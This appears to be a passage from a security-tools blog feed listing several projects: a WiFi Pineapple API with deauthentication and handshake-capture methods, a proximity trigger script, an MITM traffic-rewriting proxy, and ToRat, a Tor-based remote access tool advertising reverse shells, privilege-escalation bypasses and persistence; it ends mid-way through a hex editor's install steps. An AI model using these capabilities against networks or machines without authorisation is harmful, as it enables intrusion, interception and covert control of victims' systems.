<p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-BESheKNua9o/X_uw_NI25xI/AAAAAAAAU9Y/pMu-20pIik0JEtFkTmbsq_2U4ecE2jjqgCNcBGAsYHQ/s682/Pineapple-MK7-REST-Client_1_recon.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="519" data-original-width="682" height="488" src="https://1.bp.blogspot.com/-BESheKNua9o/X_uw_NI25xI/AAAAAAAAU9Y/pMu-20pIik0JEtFkTmbsq_2U4ecE2jjqgCNcBGAsYHQ/w640-h488/Pineapple-MK7-REST-Client_1_recon.png" width="640" /></a></div><p><br /></p><span style="font-size: large;"><b>System Authentication accessors/method</b></span><br />
<div><pre><code>system = PineappleMK7::System.new()</code></pre></div>
<pre><code>system.host = (string) "172.16.42.1"<br />system.host()<br />system.port = (string) "1471"<br />system.port()<br />system.mac = (string) "00:13:37:DD:EE:FF"<br />system.mac()<br />system.password = (string) "P@55w0rD"<br />system.login()<br /></code></pre>
<p>The <strong>host()</strong>, <strong>port()</strong> and <strong>mac()</strong> accessors return a string.</p>
<p>The <strong>login()</strong> method returns a boolean.</p>
<br /><span style="font-size: large;"><b>Modules</b></span><br />
<br /><b>Module Recon methods</b><br />
<div><pre><code>recon = PineappleMK7::Modules::Recon</code></pre></div>
<pre><code>recon.startScan( (integer) time )<br />recon.getResults( (integer) scanID )<br />recon.deleteScan( (integer) scanID )<br /></code></pre>
<p>The <strong>startScan</strong> method has a <em>scanID()</em> submethod and returns an integer.</p>
<p>The <strong>getResults</strong> method has <em>APResults()</em>, <em>UnassociatedClientResults()</em> and <em>OutOfRangeClientResults()</em> submethods.</p>
<blockquote> <p>The <strong><em>APResults()</em></strong> submethod returns an array of objects, each of which has:</p> </blockquote>
<pre><code>ssid()<br />bssid()<br />encryption()<br />hidden()<br />wps()<br />channel()<br />signal()<br />clients() -> client_mac(), ap_mac() and ap_channel()<br /></code></pre>
<blockquote> <p>The <strong><em>UnassociatedClientResults()</em></strong> submethod returns an array of objects, each of which has:</p> </blockquote>
<pre><code>client_mac()<br />ap_mac()<br />ap_channel()<br /></code></pre>
<blockquote> <p>The <strong><em>OutOfRangeClientResults()</em></strong> submethod returns an array of objects, each of which has:</p> </blockquote>
<pre><code>client_mac()<br />ap_mac()<br />ap_channel()<br /></code></pre>
<br /><b>Module PineAP methods</b><br />
<div><pre><code>pineAP = PineappleMK7::Modules::PineAP</code></pre></div>
<pre><code>pineAP.enable()<br />pineAP.startHandshakesCapture( (hash/object) ap )<br />pineAP.deauthAP( (string) bssid, (integer) channel, (array) clients )<br />pineAP.deauthClient( (string) bssid, (integer) channel, (string) mac )<br />pineAP.stopHandshakesCapture()<br />pineAP.getHandshakes()<br />pineAP.filterClient( (string "allow" or "deny") mode )<br />pineAP.filterSSID( (string "allow" or "deny") mode )<br />pineAP.addSSID( (string) ssid )<br />pineAP.clearPool()<br />pineAP.setRogue()<br />pineAP.getClients()<br />pineAP.disable()<br /></code></pre>
<p>The <strong>getHandshakes()</strong> method has a <em>handshakes()</em> submethod that returns an array of objects, each of which has:</p>
<pre><code>type()<br />bssid()<br /></code></pre>
<p>The <strong>getClients()</strong> method returns an array of objects, each of which has:</p>
<pre><code>mac()<br />ip()<br />hostname()<br />ssid()<br />tx_bytes()<br />rx_bytes()<br /></code></pre>
<br /><b>Module Notifications method</b><br />
<div><pre><code>notifications = PineappleMK7::Modules::Notifications</code></pre></div>
<pre><code>notifications.clearAll()<br /></code></pre>
<br /><b>Module Download method</b><br />
<div><pre><code>download = PineappleMK7::Modules::Download</code></pre></div>
<pre><code>download.handshake( (string) bssid, (string) type, (string) destination )<br /></code></pre>
<br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/TW-D/Pineapple-MK7-REST-Client" rel="nofollow" target="_blank" title="Download Pineapple-MK7-REST-Client">Download 
Pineapple-MK7-REST-Client</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-11889068144657890132021-01-13T08:30:00.000-03:002021-01-13T08:30:00.528-03:00RadareEye - A Tool Made For Specially Scanning Nearby devices [BLE, Bluetooth And Wifi] And Execute Our Given Command On Our System When The Target Device Comes In-Between Range<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-5yTuGyVFidA/X_usRh51YJI/AAAAAAAAU8Y/UBTU6sRz5dowe2mr3T8SvxntFuJxkyyJQCNcBGAsYHQ/s500/RadareEye_1_logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="500" data-original-width="500" src="https://1.bp.blogspot.com/-5yTuGyVFidA/X_usRh51YJI/AAAAAAAAU8Y/UBTU6sRz5dowe2mr3T8SvxntFuJxkyyJQCNcBGAsYHQ/s16000/RadareEye_1_logo.png" /></a></div><p><br /></p><p></p> <h3 align="center"><b>A tool made specially for <a href="https://www.kitploit.com/search/label/Scanning" target="_blank" title="scanning">scanning</a> nearby devices [BLE, Bluetooth &amp; Wifi] and executing a given command on our system when the target device comes within range.</b></h3><p><span></span></p><a name='more'></a><p></p><p><strong><br /></strong></p><p><strong>NOTE:- The RadareEye owner will not be responsible if any user performs malicious activities using this tool. 
Use it for learning purposes only.</strong></p> <ul> <li><strong>Installation of RadareEye:</strong></li> </ul> <pre><code>git clone https://github.com/souravbaghz/RadareEye<br /></code></pre> <br /><span style="font-size: large;"><b>Usage:</b></span><br /> <pre><code>./radare &lt;mac_addr&gt; &lt;option&gt;<br /></code></pre> <br /><span style="font-size: large;"><b>Available Options Are:</b></span><br /> <ul> <li>-blue <a href="https://www.kitploit.com/search/label/Bluetooth" target="_blank" title="Bluetooth">Bluetooth</a> RadareEye</li> <li>-ble BLE RadareEye</li> <li>-wifi Wifi AP RadareEye</li></ul><div><br /></div> <ul> <li><strong>Running Bluetooth RadareEye:</strong></li> </ul> <pre><code>sudo bash radare XX:XX:XX:XX:XX:XX -blue<br /></code></pre> <ul> <li><strong>Running BLE RadareEye:</strong></li> </ul> <pre><code>sudo bash radare XX:XX:XX:XX:XX:XX -ble<br /></code></pre> <p>The same applies to Wifi with the -wifi option. Here XX:XX:XX:XX:XX:XX means your target device's MAC address; make sure to run it with sudo (if you aren't root). I didn't add a scanning feature to this script, but you can get the MAC address easily by executing 'hcitool scan' for Bluetooth and 'hcitool lescan' for BLE devices in a terminal.</p> <p align="center"><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-F8M_YGyeUes/X_usJ4Zwx3I/AAAAAAAAU8U/RLBXPCuNRhM6QB0SEnu9Lqo86ZmLh0LcgCNcBGAsYHQ/s1920/RadareEye_2_screenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1080" data-original-width="1920" height="360" src="https://1.bp.blogspot.com/-F8M_YGyeUes/X_usJ4Zwx3I/AAAAAAAAU8U/RLBXPCuNRhM6QB0SEnu9Lqo86ZmLh0LcgCNcBGAsYHQ/w640-h360/RadareEye_2_screenshot.png" width="640" /></a></div><p align="center"><br /></p> After running RadareEye, it will ask you 'Command you want to trigger?'. You can skip it by simply leaving it blank, and RadareEye will then show you the status of your target, whether it's in range or not, without triggering any command. If you want to trigger a command when your target comes within range, enter the command when it asks. Examples: <ul> <li><strong>The command below will shut down our system immediately when the target device comes in range.</strong></li> </ul> <pre><code>[+]Command you want to trigger? :shutdown now<br /></code></pre> <ul> <li><strong>It will run your other script</strong></li> </ul> <pre><code>[+]Command you want to trigger? :./myscript.py<br /></code></pre> <br /><div><div style="text-align: center;"><b><br /></b></div><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/souravbaghz/RadareEye" rel="nofollow" target="_blank" title="Download RadareEye">Download RadareEye</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-45667280855567076952020-12-27T08:30:00.006-03:002020-12-27T08:30:04.561-03:00Proxify - Swiss Army Knife Proxy Tool For HTTP/HTTPS Traffic Capture, Manipulation, And Replay On The Go<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-dJhyUjQ-YrE/X-LNCYqfaCI/AAAAAAAAUwU/XcybR9rXo6E22foGs7KmSDEJxz_cxQ_vwCNcBGAsYHQ/s1852/proxify_7_proxify-run.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1488" data-original-width="1852" height="514" src="https://1.bp.blogspot.com/-dJhyUjQ-YrE/X-LNCYqfaCI/AAAAAAAAUwU/XcybR9rXo6E22foGs7KmSDEJxz_cxQ_vwCNcBGAsYHQ/w640-h514/proxify_7_proxify-run.png" width="640" /></a></div><p><br /></p><p></p> <p>Swiss Army Knife Proxy for rapid deployments. 
Supports multiple operations such as request/response dump, filtering and <a href="https://www.kitploit.com/search/label/Manipulation" target="_blank" title="manipulation">manipulation</a> via a DSL language, and an upstream HTTP/Socks5 proxy. Additionally, a replay utility allows importing the dumped traffic (request/responses with the correct domain name) into burp or any other proxy by simply setting the upstream proxy to proxify.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: x-large;"><b>Features</b></span><div><br /></div><div><ul style="text-align: left;"><li>Simple and modular code base making it easy to contribute.</li><li>HTTP and SOCKS5 support for upstream proxy</li><li>Native MITM support</li><li>Full traffic dump (request/responses)</li><li>Traffic Match / Filter with DSL language</li><li>Traffic Match and Replace support</li><li>Traffic replay in Burp</li></ul></div><div><br /><h1 align="left"><span style="font-size: x-large;"><b>Installation</b></span><br /> <br /><span style="font-size: large;"><b>From Binary</b></span><br /> </h1><p>The installation is easy. You can download the pre-built binaries for your platform from the <a href="https://github.com/projectdiscovery/proxify/releases/" rel="nofollow" target="_blank" title="Releases">Releases</a> page. Extract them using tar, move the binary to your <code>$PATH</code> and you're ready to go.</p> <div><pre><code>▶ tar -xvf proxify-linux-amd64.tar<br />▶ mv proxify-linux-amd64 /usr/local/bin/proxify<br />▶ proxify -version</code></pre></div> <p><strong>proxify</strong> requires <strong>go1.14+</strong> to install successfully. 
Run the following command to get the repo -</p> <br /><span style="font-size: large;"><b>From Source</b></span><br /> <div><pre><code>▶ GO111MODULE=on go get -u github.com/projectdiscovery/proxify/cmd/proxify</code></pre></div> <br /><span style="font-size: large;"><b>From Github</b></span><br /> <div><pre><code>▶ git clone https://github.com/projectdiscovery/proxify.git; cd proxify/cmd/proxify; go build; cp proxify /usr/local/bin; proxify -version</code></pre></div> <br /><span style="font-size: x-large;"><b>Usage</b></span><br /> <div><pre><code>▶ proxify -h</code></pre></div> <p>This will display help for the tool. Here are all the switches it supports.</p> <table> <tr> <th>Flag</th> <th>Description</th> <th>Example</th> </tr> <tr> <td>addr</td> <td>Listen HTTP IP and Port</td> <td>proxify -addr 127.0.0.1:8080</td> </tr> <tr> <td>config</td> <td>Config data path</td> <td>proxify -config certs</td> </tr> <tr> <td>cert-cache-size</td> <td>Number of <a href="https://www.kitploit.com/search/label/Certificates" target="_blank" title="certificates">certificates</a> to cache</td> <td>proxify -cert-cache-size 1024</td> </tr> <tr> <td>dns-addr</td> <td>Listen DNS IP and Port</td> <td>proxify -dns-addr '127.0.0.1:80'</td> </tr> <tr> <td>dns-mapping</td> <td>DNS A mapping</td> <td>proxify -dns-mapping test.com:80</td> </tr> <tr> <td>dns-resolver</td> <td>Upstream DNS resolver IP and Port</td> <td>proxify -dns-resolver '127.0.0.1:5353'</td> </tr> <tr> <td>http-proxy</td> <td>Upstream HTTP Proxy</td> <td>proxify -http-proxy http://127.0.0.1:8080</td> </tr> <tr> <td>no-color</td> <td>No Color in output</td> <td>proxify -no-color</td> </tr> <tr> <td>output</td> <td>Output Folder</td> <td>proxify -output logs</td> </tr> <tr> <td>request-dsl</td> <td>Request Filter DSL</td> <td>proxify -request-dsl "contains(request,'admim')"</td> </tr> <tr> <td>request-match-replace-dsl</td> <td>Request Match-Replace DSL</td> <td>proxify -request-match-replace-dsl "replace(request,'false','true')"</td> 
</tr> <tr> <td>response-dsl</td> <td>Response Filter DSL</td> <td>proxify -response-dsl "contains(response, md5('test'))"</td> </tr> <tr> <td>response-match-replace-dsl</td> <td>Response Match-Replace DSL</td> <td>proxify -response-match-replace-dsl "regex(response, '^authentication failed$', 'authentication ok')"</td> </tr> <tr> <td>silent</td> <td>Silent output</td> <td>proxify -silent</td> </tr> <tr> <td>socks5-proxy</td> <td>Upstream socks5 proxy</td> <td>proxify -socks5-proxy socks5://proxy-ip:port</td> </tr> <tr> <td>v</td> <td>Verbose output</td> <td>proxify -v</td> </tr> <tr> <td>version</td> <td>Current version</td> <td>proxify -version</td> </tr> </table> <br /><span style="font-size: large;"><b>Use Upstream proxy</b></span><br /> <p>Open a local proxy on port 8081 and forward the traffic to burp on port 8080</p> <div><pre><code>▶ proxify -addr ":8081" -http-proxy http://127.0.0.1:8080</code></pre></div> <p>Open a local proxy on port 8080 and forward the traffic to the TOR network</p> <div><pre><code>▶ proxify -socks5-proxy socks5://127.0.0.1:9050</code></pre></div> <br /><span style="font-size: large;"><b>Dump all the HTTP/HTTPS traffic</b></span><br /> <p>Dump all the traffic into separate files with the request followed by the response; by default <code>proxify</code> listens on <code>http://127.0.0.1:8080</code>. 
A custom address and port can be defined using the <code>addr</code> flag.</p> <p>By default, proxied requests/responses are stored in the <code>logs</code> folder.</p> <div><pre><code>▶ proxify -output db</code></pre></div> <br /><span style="font-size: large;"><b>Hostname mapping with Local DNS resolver</b></span><br /> <p>Proxify supports an embedded DNS resolver to map <a href="https://www.kitploit.com/search/label/Hostnames" target="_blank" title="hostnames">hostnames</a> to specific addresses and to define an upstream DNS server for any other domain name.</p> <p>Start a local HTTP proxy on port 8080 using an <a href="https://www.kitploit.com/search/label/Embedded" target="_blank" title="embedded">embedded</a> DNS server listening on port 53 and resolving <a href="http://www.google.it" rel="nofollow" target="_blank" title="www.google.it">www.google.it</a> to 192.168.1.1; all other FQDNs are forwarded upstream to 1.1.1.1:</p> <div><pre><code>▶ proxify -dns-addr ":53" -dns-mapping "www.google.it:192.168.1.1" -dns-resolver "1.1.1.1:53"</code></pre></div> <p>This feature is used, for example, by the <code>replay</code> utility to hijack the connections and simulate responses. It may be useful during internal assessments with private DNS servers. 
Using <code>*</code> as the domain name matches all DNS requests.</p> <br /><span style="font-size: large;"><b>Match/Filter traffic with DSL language</b></span><br /> <p>If the request or response matches the filters, the dump is tagged with the <code>.match.txt</code> suffix:</p> <div><pre><code>▶ proxify -request-dsl "contains(request,'firefox')" -response-dsl "contains(response, md5('test'))"</code></pre></div> <br /><span style="font-size: large;"><b>Match and Replace on the fly</b></span><br /> <p>Proxify supports modifying requests and responses on the fly with the DSL language.</p> <div><pre><code>▶ proxify -request-match-replace-dsl "replace(request,'firefox','chrome')" -response-match-replace-dsl "regex(response, '^authentication failed$', 'authentication ok')"</code></pre></div> <br /><span style="font-size: large;"><b>Replay all traffic into burp</b></span><br /> <p>Replay all the dumped requests/responses into the destination URL (<a href="http://127.0.0.1:8080" rel="nofollow" target="_blank" title="http://127.0.0.1:8080">http://127.0.0.1:8080</a> if not specified). For this to work it's necessary to configure burp to use proxify as its upstream proxy, as proxify will take care of hijacking the DNS resolutions and simulating the remote server from the dumped traffic. This puts exactly all requests/responses in the burp history as if they were originally sent through it, allowing, for example, an interception performed remotely in the cloud to be merged locally within burp.</p> <div><pre><code>▶ replay -output "logs/"</code></pre></div> <br /><span style="font-size: large;"><b>Installing SSL Certificate</b></span><br /> <p>A certificate authority is generated for proxify and stored in the folder <code>~/.config/proxify/</code> by default; a different folder can be specified manually with the <code>-config</code> flag. 
The generated certificate can be imported by visiting <a href="http://proxify/cacert.crt" rel="nofollow" target="_blank" title="http://proxify/cacert.crt">http://proxify/cacert.crt</a> in a browser connected to proxify.</p> <p>Installation steps for the root certificate are similar to those of other proxy tools, which include adding the cert to the system trusted root store.</p> <br /><span style="font-size: large;"><b>Applications of Proxify</b></span><br /> <p>Proxify can be used in multiple places; here are some common examples where Proxify comes in handy:</p> <details> <summary> Storing all the burp proxy history logs locally. </summary> <p>Start proxify on port <code>8081</code> with the HTTP Proxy pointing to <a href="https://www.kitploit.com/search/label/Burp%20Suite" target="_blank" title="burp suite">burp suite</a> on port <code>8080</code></p> <pre><code>proxify -addr "127.0.0.1:8081" -http-proxy "http://127.0.0.1:8080"<br /></code></pre> <p>From burp, set the Upstream Proxy to forward all the traffic back to <code>proxify</code></p> <pre><code>User Options &gt; Upstream Proxy &gt; Proxy &amp; Port &gt; 127.0.0.1 &amp; 8081<br /></code></pre> <p>Now all the request/response history will be stored in the <code>logs</code> folder and can be used later for post processing.</p> </details> <details> <summary> Store all your browsing history locally. </summary> <p>While you browse the application, you can point the browser to <code>proxify</code> to store all the HTTP requests / responses to file.</p> <p>Start proxify on the default or any port you wish,</p> <pre><code>proxify -output chrome-logs -addr ":9999"<br /></code></pre> <p>Start the Chrome browser on Mac OS,</p> <pre><code>/Applications/Chromium.app/Contents/MacOS/Chromium --ignore-certificate-errors --proxy-server=http://127.0.0.1:9999 &amp;<br /></code></pre> </details> <details> <summary> Store all the responses while you fuzz, as per your config at run time. 
</summary> <p>Start proxify on the default or any port you wish,</p> <pre><code>proxify -output ffuf-logs -addr ":9999"<br /></code></pre> <p>Run <code>FFuF</code> with the proxy pointing to <code>proxify</code></p> <pre><code>ffuf -x http://127.0.0.1:9999 FFUF_CMD_HERE<br /></code></pre> </details> <p>Proxify is made with 🖤 by the <a href="https://projectdiscovery.io" rel="nofollow" target="_blank" title="projectdiscovery">projectdiscovery</a> team. Community contributions have made the project what it is. See the <strong><a href="https://github.com/projectdiscovery/proxify/blob/master/THANKS.md" rel="nofollow" target="_blank" title="Thanks.md">Thanks.md</a></strong> file for more details.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/projectdiscovery/proxify" rel="nofollow" target="_blank" title="Download Proxify">Download Proxify</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-61243053795052852832020-12-15T08:30:00.013-03:002020-12-15T08:30:05.171-03:00ToRat - A Remote Administration Tool Written In Go Using Tor As A Transport Mechanism And RPC For Communication<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-94hr0gBJ-Oo/X9bqgzXBZ_I/AAAAAAAAUpE/uSZDA4-rSG0WCWwCiMZzu8QxpITOHX6oACNcBGAsYHQ/s1023/ToRat_1_ToRat_Logo.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="250" data-original-width="1023" height="156" src="https://1.bp.blogspot.com/-94hr0gBJ-Oo/X9bqgzXBZ_I/AAAAAAAAUpE/uSZDA4-rSG0WCWwCiMZzu8QxpITOHX6oACNcBGAsYHQ/w640-h156/ToRat_1_ToRat_Logo.png" width="640" /></a></div><p><br /></p> <p>A <a href="https://www.kitploit.com/search/label/Cross%20Platform" target="_blank" title="Cross Platform">Cross Platform</a> <a href="https://www.kitploit.com/search/label/Remote%20Administration" target="_blank" title="Remote 
Administration">Remote Administration</a> tool written in Go using Tor as its transport mechanism, currently supporting Windows, Linux and MacOS clients.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>How to</b></span><br /> <p><a href="https://github.com/lu4p/ToRat/wiki/How-to-use-the-ToRat-Docker-Image" rel="nofollow" target="_blank" title="How to use ToRat">How to use ToRat</a></p> <br /><span style="font-size: large;"><b><a href="https://asciinema.org/a/318534" target="_blank">Preview</a></b></span><br /> <p><br /></p><span style="font-size: large;"><b>Current Features</b></span><br /> <ul> <li>RPC (Remote Procedure Call) based communication for easy addition of new functionality</li> <li>Automatic upx leads to client binaries of ~6MB with embedded Tor</li> <li>the ToRAT_client communicates over TLS encrypted RPC proxied through Tor with the ToRat_server (hidden service) <ul class="contains-task-list"> <li class="task-list-item">anonymity of client and server</li> <li class="task-list-item">end-to-end encryption</li> </ul> </li> <li>Cross Platform reverse shell (Windows, Linux, Mac OS)</li> <li>Windows: <ul> <li>Multiple User Account Control Bypasses (Privilege escalation)</li> <li>Multiple Persistence methods (User, Admin)</li> </ul> </li> <li>Linux: <ul> <li>Multiple Persistence methods (User, Admin)</li> </ul> </li> <li>optional transport without Tor e.g. 
Use Tor2Web, a DNS Hostname or public/ local IP <ul class="contains-task-list"> <li class="task-list-item">smaller binary ~7MB upx'ed</li> <li class="task-list-item">anonymity of client and server</li> </ul> </li> <li>embedded Tor</li> <li>Unique persistent ID for every client <ul> <li>give a client an Alias</li> <li>all Downloads from client get saved to ./$ID/$filename</li> </ul> </li> <li>sqlite via gorm for storing information about the clients</li> <li>client is obfuscated via <a href="https://github.com/burrowers/garble" rel="nofollow" target="_blank" title="garble">garble</a></li> </ul> <br /><b>Server Shell</b><br /> <ul> <li>Supports multiple connections</li> <li>Welcome Banner</li> <li>Colored Output</li> <li>Tab-Completion of: <ul> <li>Commands</li> <li>Files/ Directories in the working directory of the server</li> </ul> </li> </ul> <table> <tbody><tr> <th>Command</th> <th>Info</th> </tr> <tr> <td><strong>select</strong></td> <td>Select client to interact with</td> </tr> <tr> <td><strong>list</strong></td> <td>list all connected clients</td> </tr> <tr> <td><strong>alias</strong></td> <td>Select client to give an alias</td> </tr> <tr> <td><strong>cd</strong></td> <td>change the working directory of the server</td> </tr> <tr> <td><strong>help</strong></td> <td>lists possible commands with usage info</td> </tr> <tr> <td><strong>exit</strong></td> <td>exit the server</td> </tr> </tbody></table> <br /><b>Shell after selection of a client</b><br /> <ul> <li>Tab-Completion of: <ul> <li>Commands</li> <li>Files/ Directories in the working directory of the client</li> </ul> </li> </ul> <table> <tbody><tr> <th>Command</th> <th>Info</th> </tr> <tr> <td><strong>cd</strong></td> <td>change the working directory of the client</td> </tr> <tr> <td><strong>ls</strong></td> <td>list the content of the working directory of the client</td> </tr> <tr> <td><strong>shred</strong></td> <td>delete files/ directories unrecoverable</td> </tr> <tr> 
<td><strong>shredremove</strong></td> <td>same as shred + removes the shredded files</td> </tr> <tr> <td><strong>screen</strong></td> <td>take a <a href="https://www.kitploit.com/search/label/Screenshot" target="_blank" title="Screenshot">Screenshot</a> of the client</td> </tr> <tr> <td><strong>cat</strong></td> <td>view Textfiles from the client including .docx, .rtf, .pdf, .odt</td> </tr> <tr> <td><strong>alias</strong></td> <td>give the client a custom alias</td> </tr> <tr> <td><strong>down</strong></td> <td>download a file from the client</td> </tr> <tr> <td><strong>up</strong></td> <td>upload a file to the client</td> </tr> <tr> <td><strong>escape</strong></td> <td>escape a command and run it in a native shell on the client</td> </tr> <tr> <td><strong>reconnect</strong></td> <td>tell the client to reconnect</td> </tr> <tr> <td><strong>help</strong></td> <td>lists possible commands with usage info</td> </tr> <tr> <td><strong>exit</strong></td> <td>background current session and return to main shell</td> </tr> <tr> <td>else</td> <td>the command will be executed in a native shell on the client</td> </tr> </tbody></table> <br /><span style="font-size: large;"><b>Upcoming Features</b></span><br /> <ul class="contains-task-list"> <li class="task-list-item">Privilege <a href="https://www.kitploit.com/search/label/Escalation" target="_blank" title="escalation">escalation</a> for Linux</li> <li class="task-list-item">Persistence and <a href="https://www.kitploit.com/search/label/Privilege%20Escalation" target="_blank" title="privilege escalation">privilege escalation</a> for Mac OS</li> <li class="task-list-item">Support for Android and iOS needs fix of <a href="https://github.com/ipsn/go-libtor/issues/12" rel="nofollow" target="_blank" title="https://github.com/ipsn/go-libtor/issues/12">https://github.com/ipsn/go-libtor/issues/12</a></li> <li class="task-list-item"><a href="https://github.com/ewhitehats/InvisiblePersistence" rel="nofollow" target="_blank" 
title="File-less Persistence on Windows">File-less Persistence on Windows</a></li> </ul> <br /><span style="font-size: large;"><b>DISCLAIMER</b></span><br /> <p>USE FOR EDUCATIONAL PURPOSES ONLY</p> <br /><span style="font-size: large;"><b>Contribution</b></span><br /> <p>All contributions are welcome; you don't need to be an expert in Go to contribute.</p> <br /><span style="font-size: large;"><b>Credits</b></span><br /> <ul> <li><a href="https://www.torproject.org/" rel="nofollow" target="_blank" title="Tor">Tor</a></li> <li><a href="https://github.com/cretz/bine" rel="nofollow" target="_blank" title="Tor controller library">Tor controller library</a></li> <li><a href="https://github.com/rootm0s/WinPwnage" rel="nofollow" target="_blank" title="Python Uacbypass and Persistence Techniques">Python Uacbypass and Persistence Techniques</a></li> <li><a href="https://github.com/abiosoft/ishell" rel="nofollow" target="_blank" title="Modern Cli">Modern Cli</a></li> <li><a href="https://github.com/fatih/color" rel="nofollow" target="_blank" title="Colored Prints">Colored Prints</a></li> <li><a href="https://github.com/vova616/screenshot" rel="nofollow" target="_blank" title="Screenshot library">Screenshot library</a></li> <li><a href="https://github.com/lu4p/genCert" rel="nofollow" target="_blank" title="TLS Certificate generator">TLS Certificate generator</a></li> <li><a href="https://github.com/lu4p/genCert" rel="nofollow" target="_blank" title="Shred library">Shred library</a></li> <li><a href="https://github.com/lu4p/cat" rel="nofollow" target="_blank" title="Extract Text from Documents">Extract Text from Documents</a></li> <li><a href="https://golang.org/pkg/net/rpc/" rel="nofollow" target="_blank" title="RPC">RPC</a></li> <li><a href="https://upx.github.io/" rel="nofollow" target="_blank" title="UPX">UPX</a></li> <li><a href="https://github.com/go-gorm/gorm" rel="nofollow" target="_blank" title="gorm">gorm</a></li> <li><a href="https://github.com/burrowers/garble" 
rel="nofollow" target="_blank" title="Obfuscation">Obfuscation</a></li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/lu4p/ToRat" rel="nofollow" target="_blank" title="Download ToRat">Download ToRat</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-73420285052000041472020-11-17T17:30:00.009-03:002020-11-17T17:30:12.410-03:00Rehex - Reverse Engineers' Hex Editor<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-168MHpgk57E/X7NdmptBhgI/AAAAAAAAUY0/0oPe5hG7G2QHp-FF-tRhCrMmzwlPZmWpQCNcBGAsYHQ/s854/rehex_2_comments-types.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="480" data-original-width="854" height="360" src="https://1.bp.blogspot.com/-168MHpgk57E/X7NdmptBhgI/AAAAAAAAUY0/0oPe5hG7G2QHp-FF-tRhCrMmzwlPZmWpQCNcBGAsYHQ/w640-h360/rehex_2_comments-types.gif" width="640" /></a></div><p><br /></p> <p>A cross-platform (Windows, Linux, Mac) <a href="https://www.kitploit.com/search/label/Hex%20Editor" target="_blank" title="hex editor">hex editor</a> for reverse engineering, and everything else.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Features</b></span><br /> <ul> <li>Large (1TB+) file support</li> <li>Decoding of integer/floating point value types</li> <li>Disassembly of machine code</li> <li>Highlighting and annotation of ranges of bytes</li> <li>Side by side comparison of selections</li> </ul> <p><br /></p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-VNjiNesvqQQ/X7NdxXQTeTI/AAAAAAAAUY8/_uN45-QIe3skQeJijG65kS7mOGsm9CvLwCNcBGAsYHQ/s854/rehex_3_file-diff.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="480" data-original-width="854" height="360" src="https://1.bp.blogspot.com/-VNjiNesvqQQ/X7NdxXQTeTI/AAAAAAAAUY8/_uN45-QIe3skQeJijG65kS7mOGsm9CvLwCNcBGAsYHQ/w640-h360/rehex_3_file-diff.gif" width="640" /></a></div><p><br /></p><span style="font-size: large;"><b>Installation</b></span><br /> <p>The <a href="https://github.com/solemnwarning/rehex/releases" rel="nofollow" target="_blank" title="Releases">Releases</a> page has standalone packages for <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="Windows">Windows</a> and Mac, as well as installable packages for popular Linux distributions, or you can install them from a distribution package repository as described below.</p> <p>The same packages are also produced for Git commits (look for the tick), if you want to try the development/unreleased versions.</p> <br /><b>Debian</b><br /> <p>First, you will need to add my APT signing key to your system:</p> <pre><code>wget -qO - https://repos.solemnwarning.net/debian-key.gpg | sudo apt-key add -<br /></code></pre> <p>Add the following lines to your <code>/etc/apt/sources.list</code> file:</p> <pre><code>deb http://repos.solemnwarning.net/debian/ CODENAME main<br />deb-src http://repos.solemnwarning.net/debian/ CODENAME main<br /></code></pre> <p>Replace <code>CODENAME</code> with the version you're running (e.g. 
<code>buster</code> or <code>stretch</code>).</p> <p>Finally, you can install the package:</p> <pre><code>$ sudo apt-get update<br />$ sudo apt-get install rehex<br /></code></pre> <br /><b>Ubuntu</b><br /> <p>First, you will need to add my APT signing key to your system:</p> <pre><code>wget -qO - https://repos.solemnwarning.net/ubuntu-key.gpg | sudo apt-key add -<br /></code></pre> <p>Add the following lines to your <code>/etc/apt/sources.list</code> file:</p> <pre><code>deb http://repos.solemnwarning.net/ubuntu/ CODENAME main<br />deb-src http://repos.solemnwarning.net/ubuntu/ CODENAME main<br /></code></pre> <p>Replace <code>CODENAME</code> with the version you're running (e.g. <code>groovy</code> for 20.10 or <code>focal</code> for 20.04).</p> <p>Finally, you can install the package:</p> <pre><code>$ sudo apt-get update<br />$ sudo apt-get install rehex<br /></code></pre> <p><strong>NOTE:</strong> Ubuntu users must have the "Universe" package repository enabled to install some of the dependencies.</p> <br /><b>Fedora</b><br /> <pre><code>$ sudo dnf copr enable solemnwarning/rehex<br />$ sudo dnf install rehex<br /></code></pre> <br /><b>CentOS</b><br /> <pre><code>$ sudo dnf install epel-release<br />$ sudo dnf copr enable solemnwarning/rehex<br />$ sudo dnf install rehex<br /></code></pre> <br /><b>openSUSE</b><br /> <pre><code>$ sudo zypper ar obs://editors editors<br />$ sudo zypper ref<br />$ sudo zypper in 